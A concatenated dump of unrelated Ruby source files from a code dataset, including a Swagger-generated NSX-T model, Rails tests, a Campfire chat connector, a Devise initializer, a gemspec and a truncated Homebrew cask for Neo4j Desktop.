if attributes.has_key?(:'_last_modified_user')
self._last_modified_user = attributes[:'_last_modified_user']
end
if attributes.has_key?(:'id')
self.id = attributes[:'id']
end
if attributes.has_key?(:'resource_type')
self.resource_type = attributes[:'resource_type']
end
if attributes.has_key?(:'mark_for_override')
self.mark_for_override = attributes[:'mark_for_override']
else
self.mark_for_override = false
end
if attributes.has_key?(:'marked_for_delete')
self.marked_for_delete = attributes[:'marked_for_delete']
else
self.marked_for_delete = false
end
if attributes.has_key?(:'IPSecVpnSession')
self.ip_sec_vpn_session = attributes[:'IPSecVpnSession']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if !@display_name.nil? && @display_name.to_s.length > 255
invalid_properties.push('invalid value for "display_name", the character length must be smaller than or equal to 255.')
end
if [email protected]? && @description.to_s.length > 1024
invalid_properties.push('invalid value for "description", the character length must be smaller than or equal to 1024.')
end
if @resource_type.nil?
invalid_properties.push('invalid value for "resource_type", resource_type cannot be nil.')
end
if @ip_sec_vpn_session.nil?
invalid_properties.push('invalid value for "ip_sec_vpn_session", ip_sec_vpn_session cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if !@display_name.nil? && @display_name.to_s.length > 255
return false if [email protected]? && @description.to_s.length > 1024
return false if @resource_type.nil?
return false if @ip_sec_vpn_session.nil?
true
end
# Custom attribute writer method with validation
# @param [Object] display_name Value to be assigned
def display_name=(display_name)
if !display_name.nil? && display_name.to_s.length > 255
fail ArgumentError, 'invalid value for "display_name", the character length must be smaller than or equal to 255.'
end
@display_name = display_name
end
# Custom attribute writer method with validation
# @param [Object] description Value to be assigned
def description=(description)
if !description.nil? && description.to_s.length > 1024
fail ArgumentError, 'invalid value for "description", the character length must be smaller than or equal to 1024.'
end
@description = description
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
_self == o._self &&
_links == o._links &&
_schema == o._schema &&
_revision == o._revision &&
_system_owned == o._system_owned &&
display_name == o.display_name &&
description == o.description &&
tags == o.tags &&
_create_user == o._create_user &&
_protection == o._protection &&
_create_time == o._create_time &&
_last_modified_time == o._last_modified_time &&
_last_modified_user == o._last_modified_user &&
id == o.id &&
resource_type == o.resource_type &&
mark_for_override == o.mark_for_override &&
marked_for_delete == o.marked_for_delete &&
ip_sec_vpn_session == o.ip_sec_vpn_session
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[_self, _links, _schema, _revision, _system_owned, display_name, description, tags, _create_user, _protection, _create_time, _last_modified_time, _last_modified_user, id, resource_type, mark_for_override, marked_for_delete, ip_sec_vpn_session].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = NSXTPolicy.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 35.039604 | 508 | 0.645097 |
ed5e76cd86f601399728799707ead16fb8e864d3 | 1,622 | require 'test_helper'
# Integration tests for UsersController authorization rules: actions that
# require login redirect to login_url, destructive actions additionally
# require admin, and the admin flag cannot be mass-assigned over the web.
class UsersControllerTest < ActionDispatch::IntegrationTest
def setup
# Fixture users: michael is the admin, archer a regular user.
@user = users(:michael)
@other_user = users(:archer)
end
test "should redirect edit when not logged in" do
get edit_user_path(@user)
assert_not flash.empty?
assert_redirected_to login_url
end
test "should redirect index when not logged in" do
get users_path
assert_redirected_to login_url
end
test "should redirect update when not logged in" do
patch user_path(@user), params: {user: {name: @user.name,
email: @user.email}}
assert_not flash.empty?
assert_redirected_to login_url
end
test "should get new" do
get signup_path
assert_response :success
end
# admin must not be settable via mass assignment (strong parameters).
test "should not allow the admin attribute to be edited via the web" do
log_in_as(@other_user)
assert_not @other_user.admin?
patch user_path(@other_user), params: {
user: {password: @other_user.password,
password_confirmation: @other_user.password,
admin: true}}
assert_not @other_user.reload.admin?
end
test "should redirect destroy when not logged in" do
assert_no_difference "User.count" do
delete user_path(@user)
end
assert_redirected_to login_url
end
test "should redirect destroy when logged in as a non-admin" do
log_in_as(@other_user)
assert_no_difference "User.count" do
delete user_path(@user)
end
assert_redirected_to root_url
end
end
| 27.491525 | 87 | 0.644266 |
38935dc667eaaf36613a9c0ea2b81c3245825676 | 3,594 | class Campfire < Linkbot::Connector
Linkbot::Connector.register('campfire', self)
# Build the connector; connection details (credentials, campfire_url,
# room) live in the options hash handled by Linkbot::Connector.
def initialize(options)
  # Bare `super` forwards the current arguments unchanged.
  super
end
# Authenticate against Campfire and join the configured room, then start
# streaming. Runs asynchronously on EventMachine: /users/me.json fetches
# the current user record, then room/<id>/join.xml joins the room, then
# listen attaches to the streaming API.
def start
request_options = {
:head => {
'authorization' => [@options['username'], @options['password']],
'Content-Type' => 'application/json'
}
}
user_http = EventMachine::HttpRequest.new("#{@options["campfire_url"]}/users/me.json").get request_options
user_http.errback { Linkbot.log.error "Campfire connector: Yeah trouble logging in." }
user_http.callback {
@user = JSON.parse(user_http.response)["user"]
# Subsequent requests authenticate with the API token instead of the
# username/password pair.
request_options[:head]['authorization'] = [@user["api_auth_token"],"x"]
request_options[:body] = "_"
join_http = EventMachine::HttpRequest.new("#{@options["campfire_url"]}/room/#{@options["room"]}/join.xml").post request_options
join_http.errback { Linkbot.log.error "Campfire connector: Yeah trouble entering the room." }
join_http.callback {
listen
}
}
end
# Attach to the room's streaming endpoint and feed every received item to
# process_message. Terminates the whole process once the stream exhausts
# its reconnect attempts.
def listen
options = {
:path => "/room/#{@options["room"]}/live.json",
:host => "streaming.campfirenow.com",
:auth => "#{@user["api_auth_token"]}:x",
:timeout => 6
}
stream = Twitter::JSONStream.connect(options)
stream.each_item do |item|
process_message(item)
end
stream.on_error do |message|
Linkbot.log.error "Campfire connector: #{message.inspect}"
end
stream.on_max_reconnects do |timeout, retries|
# NOTE(review): "Campire" typo in the log message below (left as-is;
# runtime strings are not altered in a documentation pass).
Linkbot.log.fatal "Campire connector: tried #{retries} times to connect."
exit
end
end
def process_message(item)
message = JSON.parse(item)
if message['type'] == 'TextMessage' && message['user_id'] != @user["id"]
# Check if the user who is sending this message exists in the DB yet - if not, load the users details before
# processing the message
if Linkbot.user_exists?(message['user_id'])
# Build the message
message = Message.new( message['body'], message['user_id'], Linkbot.user_ids[message['user_id']], self, :message, {} )
invoke_callbacks(message)
else
# Fetch the user data from campfire, then process the callbacks
request_options = {
:head => {
'authorization' => [@user['api_auth_token'], "x"],
'Content-Type' => 'application/json'
}
}
user_http = EventMachine::HttpRequest.new("#{@options["campfire_url"]}/users/#{message['user_id']}.json").get request_options
user_http.errback { Linkbot.log.error "Campfire connector: Yeah trouble entering the room." }
user_http.callback {
user = JSON.parse(user_http.response)["user"]
Linkbot.add_user(user["name"],user["id"])
message = Message.new( message['body'], message['user_id'], Linkbot.user_ids[message['user_id']], self, :message, {} )
invoke_callbacks(message)
}
end
end
end
def send_messages(messages,options = {})
flattened_messages = []
messages.each {|m| flattened_messages = flattened_messages + m.split("\n")}
flattened_messages.each_with_index do |m,i|
next if m.strip.empty?
request_options = {
:head => {
'authorization' => [@user["api_auth_token"],"x"],
'Content-Type' => 'application/json'
},
:body => {'message' => {'body' => m, 'type' => "TextMessage"}}.to_json
}
request = EventMachine::HttpRequest.new("#{@options["campfire_url"]}/room/#{@options['room']}/speak.json").post request_options
end
end
end
| 33.90566 | 133 | 0.622983 |
7999327130a34b9cebbf32bdef620fc022a9c751 | 733 | class CatalogCulture < ActiveRecord::Base
  # Legacy-schema model: maps onto the pre-existing `cultures` table whose
  # column names do not follow Rails conventions, and exposes Rails-style
  # attribute names via aliases.
  # NOTE(review): set_integer_columns / ignore_columns / custom_attribute /
  # categorical appear to be project-defined class macros - confirm their
  # exact semantics in the shared model concern.
  # specify schema and table name
  self.table_name = :cultures
  # specify primary key name
  self.primary_key = :id
  # override decimal set
  set_integer_columns :id, :mkey
  ignore_columns :step, :record_view, :area, :period,
                 :attrib_type, :attributor, :attrib_date,
                 :attrib_source, :attrib_comment, :certainty, :note
  # Alias legacy column names to conventional attribute names.
  custom_attribute :catalog_id, :mkey
  custom_attribute :sort, :step
  custom_attribute :attribution_type, :attrib_type
  custom_attribute :attribution_date, :attrib_date
  custom_attribute :attribution_comment, :attrib_comment
  custom_attribute :attribution_source, :attrib_source
  categorical :culture
  # Legacy FK: catalogs are referenced through the `mkey` column.
  belongs_to :catalog, foreign_key: "mkey"
end | 29.32 | 56 | 0.768076 |
614a447771db2b961a00cc2cc56f7eaf8530af29 | 50 | include_recipe 'gusztavvargadr_octopus::tentacle'
| 25 | 49 | 0.88 |
182ca84a10205b6191ffd7b8eef64870bbcd1c19 | 13,642 | # Use this hook to configure devise mailer, warden hooks and so forth.
# Many of these configuration options can be set straight in your model.
Devise.setup do |config|
# The secret key used by Devise. Devise uses this key to generate
# random tokens. Changing this key will render invalid all existing
# confirmation, reset password and unlock tokens in the database.
# Devise will use the `secret_key_base` as its `secret_key`
# by default. You can change it below and use your own secret key.
# config.secret_key = '902b3c7b46476bcd971c67694d88ab290a0dba3377b65c44fcc22c00bea617c5b0bb8df17197b825ca621fe930dfb684be84b195677c02a116380426ce4115f6'
# ==> Mailer Configuration
# Configure the e-mail address which will be shown in Devise::Mailer,
# note that it will be overwritten if you use your own mailer class
# with default "from" parameter.
config.mailer_sender = '[email protected]'
# Configure the class responsible to send e-mails.
# config.mailer = 'Devise::Mailer'
# Configure the parent class responsible to send e-mails.
# config.parent_mailer = 'ActionMailer::Base'
# ==> ORM configuration
# Load and configure the ORM. Supports :active_record (default) and
# :mongoid (bson_ext recommended) by default. Other ORMs may be
# available as additional gems.
require 'devise/orm/active_record'
# ==> Configuration for any authentication mechanism
# Configure which keys are used when authenticating a user. The default is
# just :email. You can configure it to use [:username, :subdomain], so for
# authenticating a user, both parameters are required. Remember that those
# parameters are used only when authenticating and not when retrieving from
# session. If you need permissions, you should implement that in a before filter.
# You can also supply a hash where the value is a boolean determining whether
# or not authentication should be aborted when the value is not present.
# config.authentication_keys = [:email]
# Configure parameters from the request object used for authentication. Each entry
# given should be a request method and it will automatically be passed to the
# find_for_authentication method and considered in your model lookup. For instance,
# if you set :request_keys to [:subdomain], :subdomain will be used on authentication.
# The same considerations mentioned for authentication_keys also apply to request_keys.
# config.request_keys = []
# Configure which authentication keys should be case-insensitive.
# These keys will be downcased upon creating or modifying a user and when used
# to authenticate or find a user. Default is :email.
config.case_insensitive_keys = [:email]
# Configure which authentication keys should have whitespace stripped.
# These keys will have whitespace before and after removed upon creating or
# modifying a user and when used to authenticate or find a user. Default is :email.
config.strip_whitespace_keys = [:email]
# Tell if authentication through request.params is enabled. True by default.
# It can be set to an array that will enable params authentication only for the
# given strategies, for example, `config.params_authenticatable = [:database]` will
# enable it only for database (email + password) authentication.
# config.params_authenticatable = true
# Tell if authentication through HTTP Auth is enabled. False by default.
# It can be set to an array that will enable http authentication only for the
# given strategies, for example, `config.http_authenticatable = [:database]` will
# enable it only for database authentication. The supported strategies are:
# :database = Support basic authentication with authentication key + password
# config.http_authenticatable = false
# If 401 status code should be returned for AJAX requests. True by default.
# config.http_authenticatable_on_xhr = true
# The realm used in Http Basic Authentication. 'Application' by default.
# config.http_authentication_realm = 'Application'
# It will change confirmation, password recovery and other workflows
# to behave the same regardless if the e-mail provided was right or wrong.
# Does not affect registerable.
# config.paranoid = true
# By default Devise will store the user in session. You can skip storage for
# particular strategies by setting this option.
# Notice that if you are skipping storage for all authentication paths, you
# may want to disable generating routes to Devise's sessions controller by
# passing skip: :sessions to `devise_for` in your config/routes.rb
config.skip_session_storage = [:http_auth]
# By default, Devise cleans up the CSRF token on authentication to
# avoid CSRF token fixation attacks. This means that, when using AJAX
# requests for sign in and sign up, you need to get a new CSRF token
# from the server. You can disable this option at your own risk.
# config.clean_up_csrf_token_on_authentication = true
# When false, Devise will not attempt to reload routes on eager load.
# This can reduce the time taken to boot the app but if your application
# requires the Devise mappings to be loaded during boot time the application
# won't boot properly.
# config.reload_routes = true
# ==> Configuration for :database_authenticatable
# For bcrypt, this is the cost for hashing the password and defaults to 11. If
# using other algorithms, it sets how many times you want the password to be hashed.
#
# Limiting the stretches to just one in testing will increase the performance of
# your test suite dramatically. However, it is STRONGLY RECOMMENDED to not use
# a value less than 10 in other environments. Note that, for bcrypt (the default
# algorithm), the cost increases exponentially with the number of stretches (e.g.
# a value of 20 is already extremely slow: approx. 60 seconds for 1 calculation).
config.stretches = Rails.env.test? ? 1 : 11
# Set up a pepper to generate the hashed password.
# config.pepper = 'fe51198befb2428e120bb703d307f7e6aa091e6451bd8ac4bbd022fada1e4cc6b15cab1e94a8754b7b5800fc7d95914cbd817fabba21fdc8880c134aa186697b'
# Send a notification to the original email when the user's email is changed.
# config.send_email_changed_notification = false
# Send a notification email when the user's password is changed.
# config.send_password_change_notification = false
# ==> Configuration for :confirmable
# A period that the user is allowed to access the website even without
# confirming their account. For instance, if set to 2.days, the user will be
# able to access the website for two days without confirming their account,
# access will be blocked just in the third day. Default is 0.days, meaning
# the user cannot access the website without confirming their account.
# config.allow_unconfirmed_access_for = 2.days
# A period that the user is allowed to confirm their account before their
# token becomes invalid. For example, if set to 3.days, the user can confirm
# their account within 3 days after the mail was sent, but on the fourth day
# their account can't be confirmed with the token any more.
# Default is nil, meaning there is no restriction on how long a user can take
# before confirming their account.
# config.confirm_within = 3.days
# If true, requires any email changes to be confirmed (exactly the same way as
# initial account confirmation) to be applied. Requires additional unconfirmed_email
# db field (see migrations). Until confirmed, new email is stored in
# unconfirmed_email column, and copied to email column on successful confirmation.
config.reconfirmable = true
# Defines which key will be used when confirming an account
# config.confirmation_keys = [:email]
# ==> Configuration for :rememberable
# The time the user will be remembered without asking for credentials again.
# config.remember_for = 2.weeks
# Invalidates all the remember me tokens when the user signs out.
config.expire_all_remember_me_on_sign_out = true
# If true, extends the user's remember period when remembered via cookie.
# config.extend_remember_period = false
# Options to be passed to the created cookie. For instance, you can set
# secure: true in order to force SSL only cookies.
# config.rememberable_options = {}
# ==> Configuration for :validatable
# Range for password length.
config.password_length = 6..128
# Email regex used to validate email formats. It simply asserts that
# one (and only one) @ exists in the given string. This is mainly
# to give user feedback and not to assert the e-mail validity.
config.email_regexp = /\A[^@\s]+@[^@\s]+\z/
# ==> Configuration for :timeoutable
# The time you want to timeout the user session without activity. After this
# time the user will be asked for credentials again. Default is 30 minutes.
# config.timeout_in = 30.minutes
# ==> Configuration for :lockable
# Defines which strategy will be used to lock an account.
# :failed_attempts = Locks an account after a number of failed attempts to sign in.
# :none = No lock strategy. You should handle locking by yourself.
# config.lock_strategy = :failed_attempts
# Defines which key will be used when locking and unlocking an account
# config.unlock_keys = [:email]
# Defines which strategy will be used to unlock an account.
# :email = Sends an unlock link to the user email
# :time = Re-enables login after a certain amount of time (see :unlock_in below)
# :both = Enables both strategies
# :none = No unlock strategy. You should handle unlocking by yourself.
# config.unlock_strategy = :both
# Number of authentication tries before locking an account if lock_strategy
# is failed attempts.
# config.maximum_attempts = 20
# Time interval to unlock the account if :time is enabled as unlock_strategy.
# config.unlock_in = 1.hour
# Warn on the last attempt before the account is locked.
# config.last_attempt_warning = true
# ==> Configuration for :recoverable
#
# Defines which key will be used when recovering the password for an account
# config.reset_password_keys = [:email]
# Time interval you can reset your password with a reset password key.
# Don't put a too small interval or your users won't have the time to
# change their passwords.
config.reset_password_within = 6.hours
# When set to false, does not sign a user in automatically after their password is
# reset. Defaults to true, so a user is signed in automatically after a reset.
# config.sign_in_after_reset_password = true
# ==> Configuration for :encryptable
# Allow you to use another hashing or encryption algorithm besides bcrypt (default).
# You can use :sha1, :sha512 or algorithms from others authentication tools as
# :clearance_sha1, :authlogic_sha512 (then you should set stretches above to 20
# for default behavior) and :restful_authentication_sha1 (then you should set
# stretches to 10, and copy REST_AUTH_SITE_KEY to pepper).
#
# Require the `devise-encryptable` gem when using anything other than bcrypt
# config.encryptor = :sha512
# ==> Scopes configuration
# Turn scoped views on. Before rendering "sessions/new", it will first check for
# "users/sessions/new". It's turned off by default because it's slower if you
# are using only default views.
# config.scoped_views = false
# Configure the default scope given to Warden. By default it's the first
# devise role declared in your routes (usually :user).
# config.default_scope = :user
# Set this configuration to false if you want /users/sign_out to sign out
# only the current scope. By default, Devise signs out all scopes.
# config.sign_out_all_scopes = true
# ==> Navigation configuration
# Lists the formats that should be treated as navigational. Formats like
# :html, should redirect to the sign in page when the user does not have
# access, but formats like :xml or :json, should return 401.
#
# If you have any extra navigational formats, like :iphone or :mobile, you
# should add them to the navigational formats lists.
#
# The "*/*" below is required to match Internet Explorer requests.
# config.navigational_formats = ['*/*', :html]
# The default HTTP method used to sign out a resource. Default is :delete.
config.sign_out_via = :delete
# ==> OmniAuth
# Add a new OmniAuth provider. Check the wiki for more information on setting
# up on your models and hooks.
# config.omniauth :github, 'APP_ID', 'APP_SECRET', scope: 'user,public_repo'
# ==> Warden configuration
# If you want to use other strategies, that are not supported by Devise, or
# change the failure app, you can configure them inside the config.warden block.
#
# config.warden do |manager|
# manager.intercept_401 = false
# manager.default_strategies(scope: :user).unshift :some_external_strategy
# end
# ==> Mountable engine configurations
# When using Devise inside an engine, let's call it `MyEngine`, and this engine
# is mountable, there are some extra configurations to be taken into account.
# The following options are available, assuming the engine is mounted as:
#
# mount MyEngine, at: '/my_engine'
#
# The router that invoked `devise_for`, in the example above, would be:
# config.router_name = :my_engine
#
# When using OmniAuth, Devise cannot automatically set OmniAuth path,
# so you need to do it manually. For the users scope, it would be:
# config.omniauth_path_prefix = '/my_engine/users/auth'
end
| 49.071942 | 154 | 0.751356 |
6154ff25f5a62641f296b1c754ebcea0cbbd90bd | 488 | module MotionKit
module_function
def objective_c_method_name(str)
str.split('_').inject([]) { |buffer,e| buffer.push(buffer.empty? ? e : e.capitalize) }.join
end
def camel_case(str)
str.split('_').map(&:capitalize).join
end
def setter(method_name)
setter = "set#{method_name[0].capitalize}#{method_name[1..-1]}"
unless setter.end_with?(':')
setter << ':'
end
setter
end
def appearance_class
@appearance_class ||= Class.new
end
end
| 19.52 | 95 | 0.64959 |
b9108dd9b02d50391b6a1c1eb11c5cd3db16e930 | 2,668 | # -*- encoding: utf-8 -*-
# stub: selenium-webdriver 3.14.0 ruby lib
Gem::Specification.new do |s|
s.name = "selenium-webdriver".freeze
s.version = "3.14.0"
s.required_rubygems_version = Gem::Requirement.new("> 1.3.1".freeze) if s.respond_to? :required_rubygems_version=
s.metadata = { "changelog_uri" => "https://github.com/SeleniumHQ/selenium/blob/master/rb/CHANGES", "source_code_uri" => "https://github.com/SeleniumHQ/selenium/tree/master/rb" } if s.respond_to? :metadata=
s.require_paths = ["lib".freeze]
s.authors = ["Alex Rodionov".freeze, "Titus Fortner".freeze]
s.date = "2018-08-03"
s.description = "WebDriver is a tool for writing automated tests of websites. It aims to mimic the behaviour of a real user, and as such interacts with the HTML of the application.".freeze
s.email = ["[email protected]".freeze, "[email protected]".freeze]
s.homepage = "https://github.com/SeleniumHQ/selenium".freeze
s.licenses = ["Apache-2.0".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 2.0".freeze)
s.rubygems_version = "2.5.2.3".freeze
s.summary = "The next generation developer focused tool for automated testing of webapps".freeze
s.installed_by_version = "2.5.2.3" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<rubyzip>.freeze, ["~> 1.2"])
s.add_runtime_dependency(%q<childprocess>.freeze, ["~> 0.5"])
s.add_development_dependency(%q<rspec>.freeze, ["~> 3.0"])
s.add_development_dependency(%q<rack>.freeze, ["~> 1.0"])
s.add_development_dependency(%q<webmock>.freeze, ["~> 2.0"])
s.add_development_dependency(%q<yard>.freeze, ["~> 0.9.11"])
s.add_development_dependency(%q<rubocop>.freeze, ["~> 0.50.0"])
else
s.add_dependency(%q<rubyzip>.freeze, ["~> 1.2"])
s.add_dependency(%q<childprocess>.freeze, ["~> 0.5"])
s.add_dependency(%q<rspec>.freeze, ["~> 3.0"])
s.add_dependency(%q<rack>.freeze, ["~> 1.0"])
s.add_dependency(%q<webmock>.freeze, ["~> 2.0"])
s.add_dependency(%q<yard>.freeze, ["~> 0.9.11"])
s.add_dependency(%q<rubocop>.freeze, ["~> 0.50.0"])
end
else
s.add_dependency(%q<rubyzip>.freeze, ["~> 1.2"])
s.add_dependency(%q<childprocess>.freeze, ["~> 0.5"])
s.add_dependency(%q<rspec>.freeze, ["~> 3.0"])
s.add_dependency(%q<rack>.freeze, ["~> 1.0"])
s.add_dependency(%q<webmock>.freeze, ["~> 2.0"])
s.add_dependency(%q<yard>.freeze, ["~> 0.9.11"])
s.add_dependency(%q<rubocop>.freeze, ["~> 0.50.0"])
end
end
| 50.339623 | 207 | 0.661169 |
5dc3841ed98c330fd9fb834f46b44dbad8baec8d | 1,390 | module Billy
class Skill
ATTRIBUTES = [:name, :internal_location, :external_location]
attr_accessor *ATTRIBUTES
def initialize(config = {})
config.each { |k,v| public_send("#{k}=",v) }
end
def to_s
name
end
def to_h
ATTRIBUTES.each_with_object({}) do |attribute, hash|
hash[attribute] = public_send(attribute)
end
end
def module
module_from_string(name)
end
def tasks
return @tasks if @tasks
require internal_location if internal_location
methods = self.module.instance_methods - Object.new.methods
@tasks = methods.map { |method| Task.new(name: method, skill: self) }
end
def default_task
tasks.first
end
def has_a_task?(name)
!!find_task(name)
end
def find_task(name)
tasks.detect{ |task| task.name.to_s.downcase == name.to_s.downcase }
end
def documentation?
!!has_a_task?(:documentation)
end
def documentation(*args)
execute_task(:documentation, self, *args)
end
def execute_task(name, *args)
m = Module.new
require internal_location
m.extend(self.module)
m.send(name, *args)
end
private
def module_from_string(str)
str.split('::').inject(Object) do |mod, module_name|
mod.const_get(module_name)
end
end
end
end | 19.857143 | 75 | 0.620863 |
b9e81acf79dfa89a7a9de1b023ca3898a2ab60b8 | 1,781 | # frozen_string_literal: true
require_dependency 'claims_api/json_marshal'
require_dependency 'claims_api/concerns/file_data'
module ClaimsApi
class PowerOfAttorney < ApplicationRecord
include FileData
attr_encrypted(:form_data, key: Settings.db_encryption_key, marshal: true, marshaler: ClaimsApi::JsonMarshal)
attr_encrypted(:auth_headers, key: Settings.db_encryption_key, marshal: true, marshaler: ClaimsApi::JsonMarshal)
attr_encrypted(:source_data, key: Settings.db_encryption_key, marshal: true, marshaler: ClaimsApi::JsonMarshal)
PENDING = 'pending'
UPDATED = 'updated'
ERRORED = 'errored'
before_validation :set_md5
validates :md5, uniqueness: true
def date_request_accepted
created_at&.to_date.to_s
end
def representative
form_data.merge(participant_id: nil)
end
def veteran
{ participant_id: nil }
end
def previous_poa
current_poa
end
def set_md5
headers = auth_headers.except('va_eauth_authenticationauthority',
'va_eauth_service_transaction_id',
'va_eauth_issueinstant',
'Authorization')
self.header_md5 = Digest::MD5.hexdigest headers.to_json
self.md5 = Digest::MD5.hexdigest form_data.merge(headers).to_json
end
def uploader
@uploader ||= ClaimsApi::PowerOfAttorneyUploader.new(id)
end
def external_key
source_data.present? ? source_data['email'] : Settings.bgs.external_key
end
def external_uid
source_data.present? ? source_data['icn'] : Settings.bgs.external_uid
end
def self.pending?(id)
query = where(id: id)
query.exists? ? query.first : false
end
end
end
| 28.269841 | 116 | 0.679955 |
1d41415b7fcb1ffc2d97a9760bdec25cb04e3b6e | 2,934 | require 'test_helper'
class SetSubscriptionsForItemJobTest < ActiveSupport::TestCase
  fixtures :all

  def setup
    User.current_user = Factory(:user)
  end

  test 'perform for datafile' do
    assert_subscriptions_set_after_job :data_file
  end

  test 'perform for assay' do
    assert_subscriptions_set_after_job :assay
  end

  test 'perform for study' do
    assert_subscriptions_set_after_job :study
  end

  private

  # The three tests above were byte-identical except for the factory symbol;
  # the shared flow now lives here. Creates a public subscribable of the
  # given factory type (asserting the job is enqueued on creation),
  # subscribes two people to its project, runs the job synchronously and
  # asserts both people end up subscribed to the item.
  def assert_subscriptions_set_after_job(factory_type)
    person1 = Factory(:person)
    person2 = Factory(:person)
    subscribable = nil
    # when subscribable is created, SetSubscriptionsForItemJob is also created
    assert_enqueued_with(job: SetSubscriptionsForItemJob) do
      subscribable = Factory(factory_type, policy: Factory(:public_policy))
    end

    assert_equal 1, subscribable.projects.count
    [person1, person2].each do |person|
      person.project_subscriptions.create project: subscribable.projects.first, frequency: 'weekly'
    end
    assert !subscribable.subscribed?(person1)
    assert !subscribable.subscribed?(person2)

    SetSubscriptionsForItemJob.perform_now(subscribable, subscribable.projects)

    subscribable.reload
    assert subscribable.subscribed?(person1)
    assert subscribable.subscribed?(person2)
  end
end
| 38.605263 | 122 | 0.777437 |
1c88eaa9f80020dd762e73dbc4bf082bc6758ede | 358 | require 'helper'
class TestUtils < Test::Unit::TestCase
  # Utils.blank? should be true for empty collections, empty strings and nil.
  def test_blank
    assert EmailVeracity::Utils.blank?([]), '[] should be blank.'
    assert EmailVeracity::Utils.blank?(''), '"" should be blank.'
    assert EmailVeracity::Utils.blank?(Hash.new), '{} should be blank.'
    assert EmailVeracity::Utils.blank?(nil), 'nil should be blank.'
  end
end
| 27.538462 | 71 | 0.678771 |
e8425d8ea005f325227597180013d2affe0431ae | 100 | # frozen_string_literal: true
class ImageOptim
  # Raised when ImageOptim is given an invalid or inconsistent configuration.
  class ConfigurationError < StandardError
  end
end
| 16.666667 | 47 | 0.82 |
e2e41cccf06498e23cfc379ffdc5f70f4fe0be14 | 2,196 | require 'test_helper'
class UserTest < ActiveSupport::TestCase
def setup
@user = User.new name: 'Example User', email: '[email protected]',
password: 'foobar', password_confirmation: 'foobar'
end
test 'should be valid' do
assert @user.valid?
end
test 'name should be present' do
@user.name = ''
assert_not @user.valid?
end
test 'email should be present' do
@user.email = ' ' * 6
assert_not @user.valid?
end
test 'name should not be too long' do
@user.name = 'a' * 51
assert_not @user.valid?
end
test 'email should not be too long' do
@user.email = 'a' * 244 + '@example.com'
assert_not @user.valid?
end
test 'email validation should accept valid addresses' do
valid_adresses = %w[[email protected] [email protected] [email protected]
[email protected] [email protected]]
valid_adresses.each do |valid_adress|
@user.email = valid_adress
assert @user.valid?, "#{valid_adress.inspect} should be valid"
end
end
test 'email validation should reject invalid addresses' do
invalid_adresses = %w[user@example,com user_at_foo.org user.name@example.
foo@bar_baz.com foo@bar+baz.com [email protected]]
invalid_adresses.each do |invalid_adress|
@user.email = invalid_adress
assert_not @user.valid?, "#{invalid_adress.inspect} should be invalid"
end
end
test 'email addresses should be unique' do
duplicate_user = @user.dup
@user.save
assert_not duplicate_user.valid?
end
test 'email addresses should be saved as lower-case' do
mixed_case_email = '[email protected]'
@user.email = mixed_case_email
@user.save
assert_equal mixed_case_email.downcase, @user.reload.email
end
test 'password should be present (nonblank)' do
@user.password = @user.password_confirmation = ' ' * 6
assert_not @user.valid?
end
test 'password should have a minimum length' do
@user.password = @user.password_confirmation = 'a' * 5
assert_not @user.valid?
end
test 'authenticated? should return false for a user with nil digest' do
assert_not @user.authenticated?('')
end
end
| 28.153846 | 77 | 0.67031 |
e927f562bd4b460534be5084e3750803d29c794e | 400 | cask 'neo4j' do
# note: "4" is not a version number, but an intrinsic part of the product name
version '1.2.9'
sha256 '2e26dfe20e98286dd7871235c39d8a077d9f53e2971997731e0592a60313b16a'
url "https://neo4j.com/artifact.php?name=neo4j-desktop-#{version}.dmg"
appcast 'https://neo4j.com/download/'
name 'Neo4j Desktop'
homepage 'https://neo4j.com/download/'
